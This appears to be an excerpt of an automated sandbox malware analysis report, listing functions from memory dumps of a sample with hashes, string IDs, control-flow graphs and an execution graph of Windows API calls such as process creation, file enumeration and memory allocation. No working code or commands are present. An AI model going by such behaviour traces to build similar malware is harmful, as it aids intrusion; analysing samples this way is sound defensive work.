                                                            • Opcode ID: 526664946cdf59d367deba820a059e4dfaf3dc6f844c3bf390b17ef636321425
                                                            • Instruction ID: 857305bdbfba02b2b77cb64ab6911985683543eff4f3b9207ee1974e74e692a2
                                                            • Opcode Fuzzy Hash: 526664946cdf59d367deba820a059e4dfaf3dc6f844c3bf390b17ef636321425
                                                            • Instruction Fuzzy Hash: 0A9127B0D05669CBEB60CF85D9987DEBBB1BB45308F1081C9C15D3B281C7BA1A89CF95
                                                            Function 0272922E Relevance: 26.4, Strings: 21, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: /$#2$+$0$4$:c$BL$C$Gj$I$Y$^$`+$f$i$i>$m$t$yv$zv$}
                                                            • API String ID: 0-617331232
                                                            • Opcode ID: 0d9fe08b0a411d4c11d88abc8bc2aab57cf2c48dea716e23f1fa3925386cc167
                                                            • Instruction ID: c56ed6d128341977da22fbb7e4de3c8093e3a2fefc4c3666642afc1f7d5c385f
                                                            • Opcode Fuzzy Hash: 0d9fe08b0a411d4c11d88abc8bc2aab57cf2c48dea716e23f1fa3925386cc167
                                                            • Instruction Fuzzy Hash: 9A9117B0D05669CBEB64CF85D9987DEBBB1BB05308F1081C9C1593B281C7BA1A89CF95
                                                            Function 0272D9C5 Relevance: 13.8, Strings: 11, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                            • API String ID: 0-685823316
                                                            • Opcode ID: b9a0281c628507633b51722d22e164fd841d120133abac6fcf16d45ab3862f2d
                                                            • Instruction ID: 641f15a258ad08f4906c086f353f74315cc3a1cec15dbdb6f52b40c2777c1127
                                                            • Opcode Fuzzy Hash: b9a0281c628507633b51722d22e164fd841d120133abac6fcf16d45ab3862f2d
                                                            • Instruction Fuzzy Hash: CC31A7B1D4121CAAEF54DFE0CC44FEE7BB9AF08704F10815CE618BA180DBB556488FA5
                                                            Function 027261CE Relevance: 8.8, Strings: 7, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: &$0$1$?$F$V$i
                                                            • API String ID: 0-3123711973
                                                            • Opcode ID: 2eb6d39b897ff1a2d41656db76857acd2c04c31815ff3af14003de6acb85ec0b
                                                            • Instruction ID: 0a3c46dda3fd4549a5f2982e0afad759a7b08d4b28b29526956e85964bae277e
                                                            • Opcode Fuzzy Hash: 2eb6d39b897ff1a2d41656db76857acd2c04c31815ff3af14003de6acb85ec0b
                                                            • Instruction Fuzzy Hash: CA11CC20D087CAD9DB22C6FC88482AEBF751B23224F4883D9D4F12A2D6D2754216C7A2
                                                            Function 0273503E Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0$4$A$n
                                                            • API String ID: 0-4168700205
                                                            • Opcode ID: 43c2a79bb2f97b0da33c2fc4388ccab3bed301d9738bc99c6ccfbcac214dfcde
                                                            • Instruction ID: 5cabc14f5c5189d270ec6c6caca6d148c21a8d0680101e573285a952e76a4ec7
                                                            • Opcode Fuzzy Hash: 43c2a79bb2f97b0da33c2fc4388ccab3bed301d9738bc99c6ccfbcac214dfcde
                                                            • Instruction Fuzzy Hash: FC314371D51109BBEF15DBA4CC45BEF73B9EF48304F004199E904A6240EB769B048BE5
                                                            Function 02722757 Relevance: 5.0, Strings: 4, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 1$C$VKXA$W]PE
                                                            • API String ID: 0-3703782850
                                                            • Opcode ID: 6fed6f7b6c3b83d7620e039cd20e98104286a84af2124d77ed301d29971b9906
                                                            • Instruction ID: d58e0f2209c53f9ba1005152b040a4828c81e9988891f7d0d212ca3302f99b9f
                                                            • Opcode Fuzzy Hash: 6fed6f7b6c3b83d7620e039cd20e98104286a84af2124d77ed301d29971b9906
                                                            • Instruction Fuzzy Hash: 20F0A77090020C67CF00EFA8C9046EEBB79EB40300F2084A8DC1967202E7359704CB97

                                                            Execution Graph

                                                            Execution Coverage:2.7%
                                                            Dynamic/Decrypted Code Coverage:4%
                                                            Signature Coverage:2.1%
                                                            Total number of Nodes:477
                                                            Total number of Limit Nodes:77
                                                            execution_graph 95097 50fad0 95100 517430 95097->95100 95099 50faef 95101 517495 95100->95101 95102 5174c4 95101->95102 95105 50d870 95101->95105 95102->95099 95104 5174a6 95104->95099 95107 50d7e0 95105->95107 95106 50d85c 95106->95104 95107->95106 95109 514de0 95107->95109 95110 514e45 95109->95110 95111 514e7c 95110->95111 95114 5082d0 95110->95114 95111->95107 95113 514e5e 95113->95107 95115 5082a6 95114->95115 95116 5082a8 GetFileAttributesW 95115->95116 95117 5082b3 95115->95117 95116->95117 95117->95113 95120 5159d0 95121 515a35 95120->95121 95122 515a70 95121->95122 95125 511340 95121->95125 95124 515a52 95126 51132a 95125->95126 95129 5113f8 95126->95129 95130 519300 95126->95130 95128 51132f 95128->95124 95129->95124 95131 51931a 95130->95131 95132 51932b NtClose 95131->95132 95132->95128 95506 51c510 95507 51b410 RtlFreeHeap 95506->95507 95508 51c525 95507->95508 95509 4f9d00 95510 4f9fcf 95509->95510 95512 4fa351 95510->95512 95513 51b040 95510->95513 95514 51b083 95513->95514 95519 4f3f50 95514->95519 95516 51b08f 95517 51b0c8 95516->95517 95522 515590 95516->95522 95517->95512 95521 4f3f5d 95519->95521 95526 503170 95519->95526 95521->95516 95523 5155f2 95522->95523 95524 5155ff 95523->95524 95537 501910 95523->95537 95524->95517 95527 50318d 95526->95527 95529 5031a6 95527->95529 95530 519d50 95527->95530 95529->95521 95532 519d6a 95530->95532 95531 519d99 95531->95529 95532->95531 95533 518950 LdrInitializeThunk 95532->95533 95534 519df9 95533->95534 95535 51b410 RtlFreeHeap 95534->95535 95536 519e12 95535->95536 95536->95529 95538 50194b 95537->95538 95553 507da0 95538->95553 95540 501953 95541 51b4f0 RtlAllocateHeap 95540->95541 95551 501c36 95540->95551 95542 501969 95541->95542 95543 51b4f0 RtlAllocateHeap 95542->95543 95544 50197a 95543->95544 95545 51b4f0 RtlAllocateHeap 95544->95545 95546 50198b 95545->95546 95552 501a22 95546->95552 95568 506950 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 95546->95568 95548 504460 LdrLoadDll 95549 501be2 95548->95549 95564 517ed0 95549->95564 95551->95524 95552->95548 95554 507dcc 95553->95554 95555 507c90 2 API calls 95554->95555 95556 507def 95555->95556 95557 507e11 95556->95557 95558 507df9 95556->95558 95560 507e2d 95557->95560 95562 519300 NtClose 95557->95562 95559 507e04 95558->95559 95561 519300 NtClose 95558->95561 95559->95540 95560->95540 95561->95559 95563 507e23 95562->95563 95563->95540 95565 517f31 95564->95565 95567 517f3e 95565->95567 95569 501c50 95565->95569 95567->95551 95568->95552 95585 508070 95569->95585 95571 501c70 95578 5021d3 95571->95578 95589 511070 95571->95589 95574 501e87 95576 51c5e0 2 API calls 95574->95576 95575 501ccb 95575->95578 95592 51c4b0 95575->95592 95579 501e9c 95576->95579 95577 508010 LdrInitializeThunk 95581 501eec 95577->95581 95578->95567 95579->95581 95597 500790 95579->95597 95581->95577 95581->95578 95582 500790 LdrInitializeThunk 95581->95582 95582->95581 95583 502040 95583->95581 95584 508010 LdrInitializeThunk 95583->95584 95584->95583 95586 50807d 95585->95586 95587 5080a5 95586->95587 95588 50809e SetErrorMode 95586->95588 95587->95571 95588->95587 95601 51b380 95589->95601 95591 511091 95591->95575 95593 51c4c0 95592->95593 95594 51c4c6 95592->95594 95593->95574 95595 51b4f0 RtlAllocateHeap 95594->95595 95596 51c4ec 95595->95596 95596->95574 95598 5007ac 95597->95598 95608 519580 95598->95608 95604 519460 95601->95604 95603 51b3b1 95603->95591 95605 5194f5 95604->95605 95607 51948b 95604->95607 95606 51950b NtAllocateVirtualMemory 95605->95606 95606->95603 95607->95603 95609 51959a 95608->95609 95612 2e02c70 LdrInitializeThunk 95609->95612 95610 5007b2 95610->95583 95612->95610 95133 507240 95134 507258 95133->95134 95136 5072b2 95133->95136 95134->95136 95137 50b190 95134->95137 95138 50b1b6 95137->95138 95139 50b3e3 95138->95139 95164 5196f0 95138->95164 95139->95136 95141 50b22c 95141->95139 95167 51c5e0 95141->95167 95143 50b24b 95143->95139 95144 50b31f 95143->95144 95173 518950 95143->95173 95146 505a60 LdrInitializeThunk 95144->95146 95148 50b33e 95144->95148 95146->95148 95163 50b3cb 95148->95163 95184 5184c0 95148->95184 95149 50b307 95180 508010 95149->95180 95151 50b2b6 95151->95139 95151->95149 95152 50b2e8 95151->95152 95177 505a60 95151->95177 95199 514710 LdrInitializeThunk 95152->95199 95154 508010 LdrInitializeThunk 95158 50b3d9 95154->95158 95158->95136 95159 50b3a2 95189 518570 95159->95189 95161 50b3bc 95194 5186d0 95161->95194 95163->95154 95165 51970d 95164->95165 95166 51971e CreateProcessInternalW 95165->95166 95166->95141 95168 51c550 95167->95168 95169 51c5ad 95168->95169 95200 51b4f0 95168->95200 95169->95143 95171 51c58a 95203 51b410 95171->95203 95174 51896a 95173->95174 95212 2e02c0a 95174->95212 95175 50b2ad 95175->95144 95175->95151 95178 505a9e 95177->95178 95215 518b20 95177->95215 95178->95152 95181 508023 95180->95181 95221 518850 95181->95221 95183 50804e 95183->95136 95185 51853d 95184->95185 95186 5184eb 95184->95186 95227 2e039b0 LdrInitializeThunk 95185->95227 95186->95159 95187 518562 95187->95159 95190 5185ea 95189->95190 95191 518598 95189->95191 95228 2e04340 LdrInitializeThunk 95190->95228 95191->95161 95192 51860f 95192->95161 95195 51874d 95194->95195 95197 5186fb 95194->95197 95229 2e02fb0 LdrInitializeThunk 95195->95229 95196 518772 95196->95163 95197->95163 95199->95149 95206 519610 95200->95206 95202 51b50b 95202->95171 95209 519660 95203->95209 95205 51b429 95205->95169 95207 51962a 95206->95207 95208 51963b RtlAllocateHeap 95207->95208 95208->95202 95210 51967a 95209->95210 95211 51968b RtlFreeHeap 95210->95211 95211->95205 95213 2e02c11 95212->95213 95214 2e02c1f LdrInitializeThunk 95212->95214 95213->95175 95214->95175 95216 518bd1 95215->95216 95217 518b4f 95215->95217 95220 2e02d10 LdrInitializeThunk 95216->95220 95217->95178 95218 518c16 95218->95178 95220->95218 95222 5188cb 95221->95222 95224 518878 95221->95224 95226 2e02dd0 LdrInitializeThunk 95222->95226 95223 5188f0 95223->95183 95224->95183 95226->95223 95227->95187 95228->95192 95229->95196 95230 506cc0 95231 506cea 95230->95231 95234 507e40 95231->95234 95233 506d14 95235 507e5d 95234->95235 95241 518a40 95235->95241 95237 507ead 95238 507eb4 95237->95238 95239 518b20 LdrInitializeThunk 95237->95239 95238->95233 95240 507edd 95239->95240 95240->95233 95242 518adb 95241->95242 95243 518a6b 95241->95243 95246 2e02f30 LdrInitializeThunk 95242->95246 95243->95237 95244 518b14 95244->95237 95246->95244 95613 50c500 95615 50c529 95613->95615 95614 50c62d 95615->95614 95616 50c5d3 FindFirstFileW 95615->95616 95616->95614 95618 50c5ee 95616->95618 95617 50c614 FindNextFileW 95617->95618 95619 50c626 FindClose 95617->95619 95618->95617 95619->95614 95248 511a40 95249 511a59 95248->95249 95250 511aa4 95249->95250 95253 511ae7 95249->95253 95255 511aec 95249->95255 95251 51b410 RtlFreeHeap 95250->95251 95252 511ab4 95251->95252 95254 51b410 RtlFreeHeap 95253->95254 95254->95255 95620 516000 95621 51605a 95620->95621 95623 516067 95621->95623 95624 513a10 95621->95624 95625 51b380 NtAllocateVirtualMemory 95624->95625 95626 513a51 95625->95626 95627 504460 LdrLoadDll 95626->95627 95629 513b5e 95626->95629 95630 513a97 95627->95630 95628 513ae0 Sleep 95628->95630 95629->95623 95630->95628 95630->95629 95631 519000 95632 51902f 95631->95632 95633 5190b7 95631->95633 95634 5190cd NtCreateFile 95633->95634 95635 518900 95636 51891a 95635->95636 95639 2e02df0 LdrInitializeThunk 95636->95639 95637 518942 95639->95637 95640 518780 95641 5187ab 95640->95641 95642 51880f 95640->95642 95645 2e02ee0 LdrInitializeThunk 95642->95645 95643 518840 95645->95643 95256 500cf0 95257 500d0a 95256->95257 95262 504460 95257->95262 95259 500d28 95260 500d6d 95259->95260 95261 500d5c PostThreadMessageW 95259->95261 95261->95260 95263 504484 95262->95263 95264 5044c0 LdrLoadDll 95263->95264 95265 50448b 95263->95265 95264->95265 95265->95259 95266 5021f0 95267 518950 LdrInitializeThunk 95266->95267 95268 502226 95267->95268 95271 519390 95268->95271 95270 50223b 95272 51941f 95271->95272 95273 5193bb 95271->95273 95276 2e02e80 LdrInitializeThunk 95272->95276 95273->95270 95274 519450 95274->95270 95276->95274 95277 519170 95278 519214 95277->95278 95280 519198 95277->95280 95279 51922a NtReadFile 95278->95279 95281 515770 95282 5157d2 95281->95282 95284 5157df 95282->95284 95285 5072c0 95282->95285 95286 5072ab 95285->95286 95287 50732c 95286->95287 95288 50b190 9 API calls 95286->95288 95289 5072b2 95288->95289 95289->95284 95646 5116b0 95647 5116cc 95646->95647 95648 5116f4 95647->95648 95649 511708 95647->95649 95651 519300 NtClose 95648->95651 95650 519300 NtClose 95649->95650 95653 511711 95650->95653 95652 5116fd 95651->95652 95656 51b530 RtlAllocateHeap 95653->95656 95655 51171c 95656->95655 95657 508734 95658 508744 95657->95658 95659 5086f4 95658->95659 95661 506fe0 95658->95661 95662 506ff6 95661->95662 95664 50702f 95661->95664 95662->95664 95665 506e50 LdrLoadDll 95662->95665 95664->95659 95665->95664 95666 4f9ca0 95667 4f9caf 95666->95667 95668 4f9cf0 95667->95668 95669 4f9cdd CreateThread 95667->95669 95290 50ac60 95295 50a970 95290->95295 95292 50ac6d 95311 50a5f0 95292->95311 95294 50ac89 95296 50a995 95295->95296 95323 508280 95296->95323 95299 50aae3 95299->95292 95301 50aafa 95301->95292 95302 514de0 GetFileAttributesW 95303 50aaf1 95302->95303 95303->95301 95303->95302 95306 50abe7 95303->95306 95342 50a040 95303->95342 95305 514de0 GetFileAttributesW 95305->95306 95306->95305 95308 50ac4a 95306->95308 95351 50a3b0 95306->95351 95309 51b410 RtlFreeHeap 95308->95309 95310 50ac51 95309->95310 95310->95292 95312 50a606 95311->95312 95315 50a611 95311->95315 95313 51b4f0 RtlAllocateHeap 95312->95313 95313->95315 95314 50a632 95314->95294 95315->95314 95316 508280 GetFileAttributesW 95315->95316 95317 50a942 95315->95317 95320 514de0 GetFileAttributesW 95315->95320 95321 50a040 RtlFreeHeap 95315->95321 95322 50a3b0 RtlFreeHeap 95315->95322 95316->95315 95318 51b410 RtlFreeHeap 95317->95318 95319 50a95b 95317->95319 95318->95319 95319->95294 95320->95315 95321->95315 95322->95315 95324 5082a1 95323->95324 95325 5082a8 GetFileAttributesW 95324->95325 95326 5082b3 95324->95326 95325->95326 95326->95299 95327 5132e0 95326->95327 95328 5132ee 95327->95328 95329 5132f5 95327->95329 95328->95303 95330 504460 LdrLoadDll 95329->95330 95331 51332a 95330->95331 95332 513339 95331->95332 95355 512da0 LdrLoadDll 95331->95355 95334 51b4f0 RtlAllocateHeap 95332->95334 95338 5134e7 95332->95338 95335 513352 95334->95335 95336 5134dd 95335->95336 95335->95338 95339 51336e 95335->95339 95337 51b410 RtlFreeHeap 95336->95337 95336->95338 95337->95338 95338->95303 95339->95338 95340 51b410 RtlFreeHeap 95339->95340 95341 5134d1 95340->95341 95341->95303 95343 50a066 95342->95343 95356 50da70 95343->95356 95345 50a0d8 95347 50a0f6 95345->95347 95348 50a260 95345->95348 95346 50a245 95346->95303 95347->95346 95361 509f00 95347->95361 95348->95346 95349 509f00 RtlFreeHeap 95348->95349 95349->95348 95352 50a3d6 95351->95352 95353 50da70 RtlFreeHeap 95352->95353 95354 50a45d 95353->95354 95354->95306 95355->95332 95357 50da82 95356->95357 95358 50daa1 95357->95358 95359 51b410 RtlFreeHeap 95357->95359 95358->95345 95360 50dae4 95359->95360 95360->95345 95362 509f1d 95361->95362 95365 50db00 95362->95365 95364 50a023 95364->95347 95366 50db24 95365->95366 95367 50dbce 95366->95367 95368 51b410 RtlFreeHeap 95366->95368 95367->95364 95368->95367 95369 2e02ad0 LdrInitializeThunk 95370 507060 95371 50707c 95370->95371 95372 5070cf 95370->95372 95371->95372 95373 519300 NtClose 95371->95373 95374 507207 95372->95374 95381 506480 NtClose LdrInitializeThunk LdrInitializeThunk 95372->95381 95375 507097 95373->95375 95380 506480 NtClose LdrInitializeThunk LdrInitializeThunk 95375->95380 95378 5071e1 95378->95374 95382 506650 NtClose LdrInitializeThunk LdrInitializeThunk 95378->95382 95380->95372 95381->95378 95382->95374 95383 505ae0 95384 508010 LdrInitializeThunk 95383->95384 95385 505b10 95383->95385 95384->95385 95387 505b3c 95385->95387 95388 507f90 95385->95388 95389 507fd4 95388->95389 95390 507ff5 95389->95390 95395 518620 95389->95395 95390->95385 95392 507fe5 95393 508001 95392->95393 95394 519300 NtClose 95392->95394 95393->95385 95394->95390 95396 51869d 95395->95396 95398 51864c 95395->95398 95400 2e04650 LdrInitializeThunk 95396->95400 95397 5186c2 95397->95392 95398->95392 95400->95397 95401 50f760 95402 50f7c4 95401->95402 95430 5061f0 95402->95430 95404 50f8fe 95405 50f8f7 95405->95404 95437 506300 95405->95437 95407 50faa3 95408 50f97a 95408->95407 95409 50fab2 95408->95409 95441 50f540 95408->95441 95410 519300 NtClose 95409->95410 95412 50fabc 95410->95412 95413 50f9b6 95413->95409 95414 50f9c1 95413->95414 95415 51b4f0 RtlAllocateHeap 95414->95415 95416 50f9ea 95415->95416 95417 50f9f3 95416->95417 95418 50fa09 95416->95418 95419 519300 NtClose 95417->95419 95450 50f430 CoInitialize 95418->95450 95421 50f9fd 95419->95421 95422 50fa17 95453 518dd0 95422->95453 95424 50fa92 95425 519300 NtClose 95424->95425 95426 50fa9c 95425->95426 95427 51b410 RtlFreeHeap 95426->95427 95427->95407 95428 50fa35 95428->95424 95429 518dd0 LdrInitializeThunk 95428->95429 95429->95428 95431 506223 95430->95431 95432 506247 95431->95432 95457 518e70 95431->95457 95432->95405 95434 519300 NtClose 95436 5062ea 95434->95436 95435 50626a 95435->95432 95435->95434 95436->95405 95438 506325 95437->95438 95462 518c60 95438->95462 95442 50f55c 95441->95442 95443 504460 LdrLoadDll 95442->95443 95445 50f57a 95443->95445 95444 50f583 95444->95413 95445->95444 95446 504460 LdrLoadDll 95445->95446 95447 50f64e 95446->95447 95448 504460 LdrLoadDll 95447->95448 95449 50f6ab 95447->95449 95448->95449 95449->95413 95452 50f495 95450->95452 95451 50f52b CoUninitialize 95451->95422 95452->95451 95454 518dea 95453->95454 95467 2e02ba0 LdrInitializeThunk 95454->95467 95455 518e1a 95455->95428 95458 518e8d 95457->95458 95461 2e02ca0 LdrInitializeThunk 95458->95461 95459 518eb9 95459->95435 95461->95459 95463 518c7a 95462->95463 95466 2e02c60 LdrInitializeThunk 95463->95466 95464 506399 95464->95408 95466->95464 95467->95455 95468 510060 95469 51007d 95468->95469 95470 504460 LdrLoadDll 95469->95470 95471 51009b 95470->95471 95472 519260 95473 5192d4 95472->95473 95475 519288 95472->95475 95474 5192ea NtDeleteFile 95473->95474 95476 503063 95481 507c90 95476->95481 95479 50308f 95480 519300 NtClose 95480->95479 95482 507c9a 95481->95482 95486 503073 95482->95486 95487 5189f0 95482->95487 95485 519300 NtClose 95485->95486 95486->95479 95486->95480 95488 518a0d 95487->95488 95491 2e035c0 LdrInitializeThunk 95488->95491 95489 507d7a 95489->95485 95491->95489 95675 5026a7 95676 5026e8 95675->95676 95677 5061f0 2 API calls 95676->95677 95678 5026f3 95677->95678 95492 50226e 95493 502224 95492->95493 95494 50223b 95493->95494 95495 519390 LdrInitializeThunk 95493->95495 95495->95494 95679 4fb4b0 95680 51b380 NtAllocateVirtualMemory 95679->95680 95681 4fcb21 95680->95681 95682 509b2f 95683 509b46 95682->95683 95684 509b4b 95682->95684 95685 51b410 RtlFreeHeap 95684->95685 95686 509b7d 95684->95686 95685->95686

                                                            Executed Functions

                                                            Function 004F9D00 Relevance: 21.6, Strings: 17, Instructions: 338COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 171 4f9d00-4f9fcd 172 4f9fcf-4f9fd8 171->172 173 4f9fde-4f9fe7 171->173 172->173 174 4f9ffe-4fa008 173->174 175 4f9fe9-4f9ffc 173->175 176 4fa019-4fa020 174->176 175->172 177 4fa04b 176->177 178 4fa022-4fa049 176->178 179 4fa052-4fa05c 177->179 178->176 181 4fa05e-4fa07d 179->181 182 4fa090-4fa0a1 179->182 183 4fa07f-4fa088 181->183 184 4fa08e 181->184 185 4fa0b2-4fa0bb 182->185 183->184 184->179 186 4fa0ce-4fa0df 185->186 187 4fa0bd-4fa0cc 185->187 188 4fa0f0-4fa0fc 186->188 187->185 190 4fa0fe-4fa110 188->190 191 4fa112-4fa11b 188->191 190->188 192 4fa27c-4fa286 191->192 193 4fa121-4fa13a 191->193 195 4fa297-4fa2a0 192->195 193->193 196 4fa13c-4fa154 193->196 197 4fa2be-4fa2c8 195->197 198 4fa2a2-4fa2ae 195->198 199 4fa15a-4fa164 196->199 200 4fa240-4fa246 196->200 204 4fa2d9-4fa2e5 197->204 202 4fa2bc 198->202 203 4fa2b0-4fa2b6 198->203 201 4fa175-4fa181 199->201 205 4fa24a-4fa24e 200->205 206 4fa194-4fa19e 201->206 207 4fa183-4fa192 201->207 202->195 203->202 209 4fa2e7-4fa2f3 204->209 210 4fa2f5-4fa2fc 204->210 211 4fa277 205->211 212 4fa250-4fa275 205->212 214 4fa1af-4fa1bb 206->214 207->201 209->204 215 4fa2fe-4fa308 210->215 216 4fa351-4fa358 210->216 211->191 212->205 218 4fa1bd-4fa1d0 214->218 219 4fa1d2-4fa1d6 214->219 222 4fa319-4fa325 215->222 220 4fa37d-4fa386 216->220 221 4fa35a-4fa370 216->221 218->214 226 4fa1d8-4fa202 219->226 227 4fa204-4fa20b 219->227 228 4fa3ab-4fa3af 220->228 229 4fa388-4fa3a9 220->229 224 4fa37b 221->224 225 4fa372-4fa378 221->225 230 4fa34c call 51b040 222->230 231 4fa327-4fa330 222->231 224->216 225->224 226->219 233 4fa23e 227->233 234 4fa20d-4fa23c 227->234 235 4fa3b1-4fa3ce 228->235 236 4fa3d0-4fa3da 228->236 229->220 230->216 237 4fa337-4fa339 231->237 238 4fa332-4fa336 231->238 233->192 234->227 235->228 239 4fa33b-4fa344 237->239 240 4fa34a 237->240 238->237 239->240 241 4fa30a-4fa313 240->241 241->222
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 2$):$+x$1`$<8$>$BL$Fv$L$R<$[$g$l$lv$u7$}$5
                                                            • API String ID: 0-2604029153
                                                            • Opcode ID: f6807ac356e188390788d846bc9781ce0a6ceb2389fc75930f836422dc4f57d8
                                                            • Instruction ID: c8e5b6b8c0c42b42009173209fc1370a1d9af6fb5bb402caa4062da76de9e5bf
                                                            • Opcode Fuzzy Hash: f6807ac356e188390788d846bc9781ce0a6ceb2389fc75930f836422dc4f57d8
                                                            • Instruction Fuzzy Hash: 9902A0B090526DCBEB24CF85C9547ADBBB1BB44308F1081DAC60D7B280C7B95A99DF56
                                                            Function 0050C500 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 0050C5E4
                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 0050C61F
                                                            • FindClose.KERNELBASE(?), ref: 0050C62A
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: 86011c127d856a0f2cf1489457390f07b8c344b9b3ec3ab41ca31718808f41b2
                                                            • Instruction ID: 5a244e49a58848cad58248b3b90f5e1ac4e7be9094748249aed30a966cad7a2c
                                                            • Opcode Fuzzy Hash: 86011c127d856a0f2cf1489457390f07b8c344b9b3ec3ab41ca31718808f41b2
                                                            • Instruction Fuzzy Hash: F831C87190030DBBEB20DB64CC85FFF7B7CAF84705F144558BA09A7181D675AA85CBA4
                                                            Function 00519000 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtCreateFile.NTDLL(?,?,?,?,?,?,FC8E4B7A,?,?,?,?), ref: 005190FE
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 6c116602c3ce2a7586dbde19a51ad50e29691ae579f357658d5e73b24c415cbe
                                                            • Instruction ID: f84ab82aa20cc25b652f6023ca49830b330a2ecd42b35590844f58c821b30bea
                                                            • Opcode Fuzzy Hash: 6c116602c3ce2a7586dbde19a51ad50e29691ae579f357658d5e73b24c415cbe
                                                            • Instruction Fuzzy Hash: 0031E3B5A01209AFDB14DF98D881EEEB7F9EF8C304F108219F919A7344D774A841CBA5
                                                            Function 00519170 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtReadFile.NTDLL(?,?,?,?,?,?,FC8E4B7A,?,?), ref: 00519253
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 2825084812d6e97e4a90768c6b76eb88233662d4728ecb26d01c52c31c1abc37
                                                            • Instruction ID: d3340376f8d13235834fffcfe68e582c6d99eb6b708471cf7e7e4b4d46f822f7
                                                            • Opcode Fuzzy Hash: 2825084812d6e97e4a90768c6b76eb88233662d4728ecb26d01c52c31c1abc37
                                                            • Instruction Fuzzy Hash: E731F6B5A00209ABDB14DF98D881EEEBBB9EF8C314F108119F918A7240D774A9118BA5
                                                            Function 00519460 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(00501CCB,?,00517F3E,00000000,00000004,00003000,?,?,?,?,?,00517F3E,00501CCB,0051B3B1,00517F3E,56C03309), ref: 00519528
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateMemoryVirtual
                                                            • String ID:
                                                            • API String ID: 2167126740-0
                                                            • Opcode ID: b03ee4917efc09109f1d551df49a914dcd29543988b4e9671e209da27d2be6ba
                                                            • Instruction ID: 8d88cc24edb7a66c76c4e94072cdda48a49992372953c3403c0f2e00f337f89b
                                                            • Opcode Fuzzy Hash: b03ee4917efc09109f1d551df49a914dcd29543988b4e9671e209da27d2be6ba
